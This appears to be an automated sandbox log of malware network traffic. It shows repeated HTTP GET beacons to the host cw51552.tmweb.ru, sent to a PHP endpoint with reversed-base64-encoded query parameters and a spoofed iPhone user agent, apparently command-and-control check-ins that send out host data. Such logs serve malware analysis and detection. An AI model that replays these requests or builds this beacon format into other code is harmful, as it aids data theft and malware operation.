Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
